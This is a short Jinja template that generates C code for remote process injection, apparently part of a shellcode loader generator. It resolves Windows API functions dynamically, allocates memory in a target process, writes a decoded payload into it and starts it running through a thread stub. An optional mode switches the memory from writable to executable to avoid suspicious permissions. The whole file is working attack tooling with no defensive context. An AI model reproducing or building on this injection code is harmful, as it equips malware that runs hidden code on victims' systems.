{% from "macros.jinja" import function_typedef, function_definition, createThreadStub with context %}

{% if section == "globals" %}
    {{ function_typedef("VirtualAllocEx") }}
    {{ function_typedef("WriteProcessMemory") }}
    {{ function_typedef("VirtualProtectEx") }}
    {{ function_typedef("CreateThread") }}

    void *alloc(void *decoded, SIZE_T length, HANDLE hProc){
        {{ function_definition("VirtualAllocEx") }}
        {{ function_definition("WriteProcessMemory") }}
        {{ function_definition("VirtualProtectEx") }}

        {% if protection == "rx" %}
            LPVOID pRemoteCode = pVirtualAllocEx(
                hProc, NULL, length, MEM_COMMIT, PAGE_READWRITE
            );
            pWriteProcessMemory(
                hProc, pRemoteCode, (PVOID) decoded, length, (SIZE_T*) NULL
            );
            {{ createThreadStub("remote", "pRemoteCode", "pRemoteCode") }}
            DWORD old;
            pVirtualProtectEx(
                hProc, pRemoteCode, length, PAGE_EXECUTE_READ, &old
            );
        {% else %}
            LPVOID pRemoteCode = pVirtualAllocEx(
                hProc, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE
            );
            pWriteProcessMemory(
                hProc, pRemoteCode, (PVOID) decoded, length, (SIZE_T*) NULL
            );
            {{ createThreadStub("remote", "pRemoteCode", "pRemoteCode") }}
        {% endif %}
        return pRemoteCode;
    }
{% else %}
    void *mem = alloc(raw, length, hProc);
{% endif %}
